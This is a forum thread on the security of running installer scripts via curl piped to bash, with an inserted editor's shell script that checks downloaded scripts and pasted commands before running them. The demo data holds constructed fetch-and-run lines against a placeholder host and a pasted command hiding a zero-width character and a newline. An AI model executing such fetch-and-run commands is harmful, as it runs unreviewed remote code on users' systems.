Is this much worse than downloading some installer and running it? Those can be just as compromised. So can packages in package managers for that matter.
bananabiscuit|4 years ago
e12e|4 years ago
You can't know that curl and your browser get the same data - but you can for example split it up:
Ed: or just "save as" like with an installer.
Piping straight to bash can be especially bad if you've cached sudo credentials for the current session - some of these scripts call sudo "inside".
Otoh - the connection is signed (it's https) - unfortunately it's often quite easy to compromise a web site. Obviously, listing gpg signatures on the same page doesn't add much unless it's possible to verify the gpg key some other way.
Ed: another problem is that you really should check exactly what's in your clipboard before pasting to a terminal.
rbanffy|4 years ago
> Is this much worse than downloading some installer and running it?
Yes.
You should inspect what you download.
Also, you should probably use the Python interpreters provided by your Linux distro, that stay in directories you usually can't write to and come in signed packages. On a Mac, the next best thing would be MacPorts.
kim0|4 years ago
nxpnsv|4 years ago
I think it'll compile various Pythons on your machine under your user. I'd prefer to install (learned this today) with Homebrew multiple versions (not sure how possible it is) as `brew install python@3.6 python@3.7 python@3.9` (because Big Sur has 3.8 built-in).
rbanffy|4 years ago
In reality, I'm a more traditional Unix person and prefer MacPorts, where you can do `sudo port install python36 python37 python39` in a very BSD way of doing things.
Homebrew has broken my computer one time too many.
maccard|4 years ago
The script is served over https, so it's not going to be tampered with (unless you have a malicious cert, but at that point you can't trust anyone), and curl | bash isn't any worse than downloading a script and just running it, or running a precompiled binary you don't trust.
doix|4 years ago
pyenv could get taken over and you won't know. It's also possible to detect when someone is piping to bash (on the server) and serve a different payload [0]. You're better off piping curl to a file, reviewing the file and then running it manually.
[0]: https://www.idontplaydarts.com/2016/04/detecting-curl-pipe-b...
jayknight|4 years ago
It's also possible for you to copy things you can't see from web pages. So the command(s) you end up with may not be what you thought. So there's a trust issue with the site you get instructions from as well.
See http://thejh.net/misc/website-terminal-copy-paste
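Added example (editor's code, not from the thread and not pyenv's installer) tying together e12e's "split it up", doix's advice to save and review the file, and jayknight's hidden-copy point: save the script instead of piping it, compare the saved copy with a second fetch, look for sudo calls, dump a pasted command byte by byte, and drop the cached sudo timestamp before running. The URLs, the sample installer and the pasted text are constructed for the demo (example.invalid does not resolve); the tooling used is ordinary curl, cmp, grep, od and sha256sum/shasum.

```shell
#!/bin/sh
# Added example, not from the thread and not pyenv's installer: the "split it up"
# workflow. Save the script to a file, check what arrived against a second copy or an
# out-of-band hash, look for sudo calls, dump pasted text byte by byte, and only then
# run it. All sample data below is constructed; nothing touches the network.
set -u

fetch_to_file() {
    # $1: URL, $2: output path. Saving to disk means the bytes you review are the bytes
    # you run, and a server that fingerprints curl|bash read timing sees a plain download.
    curl -fsSL --proto '=https' --tlsv1.2 -o "$2" "$1"
}

same_bytes() {
    # $1, $2: two copies of the script (say browser "save as" and curl). 0 if identical.
    cmp -s "$1" "$2"
}

sha256_of() {
    # Prints the SHA-256 of $1 (GNU sha256sum or macOS shasum) for comparison with a
    # value published somewhere other than the page that serves the script.
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

privileged_calls() {
    # Prints each line of $1 that invokes sudo, doas or su; returns 0 if any exist.
    # A hit is what a cached sudo timestamp would satisfy silently under curl|bash.
    grep -nE '(^|[^[:alnum:]_./-])(sudo|doas|su)([[:space:]]|$)' "$1"
}

has_hidden_chars() {
    # $1: text copied from a web page. Returns 0 if it holds a newline (it would run
    # before you could read it) or any byte outside printable ASCII: tab, CR, ESC/ANSI
    # sequences, zero-width Unicode and so on. Returns 1 for plain visible text.
    lines=$(printf '%s' "$1" | wc -l)
    [ "$((lines + 0))" -gt 0 ] && return 0
    printf '%s' "$1" | LC_ALL=C grep -q '[^ -~]'
}

show_hidden() {
    # Dumps $1 byte by byte so what the browser hid is visible.
    printf '%s' "$1" | od -An -c
}

run_reviewed() {
    # Run $1 only after the checks above. sudo -K drops the cached credential first, so
    # a sudo buried in the script has to prompt instead of riding on earlier authentication.
    command -v sudo >/dev/null 2>&1 && sudo -K
    sh "$1"
}

# ---- demo on constructed data ------------------------------------------------
# Constructed stand-in for an installer (not the real pyenv script).
SAVED_AS='#!/bin/bash
set -e
echo "Installing into $HOME/.example"
git clone https://example.invalid/example.git "$HOME/.example"
sudo apt-get install -y build-essential
'
# What a server that fingerprints curl|bash might hand the non-browser client instead.
CURLED="$SAVED_AS"'curl -s https://example.invalid/extra.sh | bash
'
# Constructed "copy this" text with a zero-width space (U+200B) and a hidden newline.
PASTED='curl https://example.invalid/install.sh'"$(printf '\342\200\213')"' | bash
echo pwned'

tmp_saved=$(mktemp) && tmp_curled=$(mktemp)
printf '%s' "$SAVED_AS" > "$tmp_saved"
printf '%s' "$CURLED" > "$tmp_curled"

echo "== browser copy vs curl copy =="
if same_bytes "$tmp_saved" "$tmp_curled"; then
    echo "identical, sha256 $(sha256_of "$tmp_saved")"
else
    echo "DIFFERENT: the curl client was served something else"
    diff "$tmp_saved" "$tmp_curled" || true
fi

echo "== lines wanting more than your own privileges =="
privileged_calls "$tmp_saved" || echo "(none)"

echo "== pasted command =="
if has_hidden_chars "$PASTED"; then
    echo "hidden bytes present, do not paste this into a terminal:"
    show_hidden "$PASTED"
fi
rm -f "$tmp_saved" "$tmp_curled"
# After a clean review: run_reviewed "$tmp_saved"
```

The hash or gpg check is only worth doing against a value obtained somewhere other than the page that serves the script (a signed tag, release notes, a second channel), which is e12e's point about signatures on the same page. `sudo -K` is what turns a silent `sudo` inside the script into a visible prompt; on a machine with no sudo the call is simply skipped.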
Cthulhu_|4 years ago
They should offer a download with signature validation instead. Signed by Apple, Microsoft, etc if possible.
ktm8|4 years ago
lvncelot|4 years ago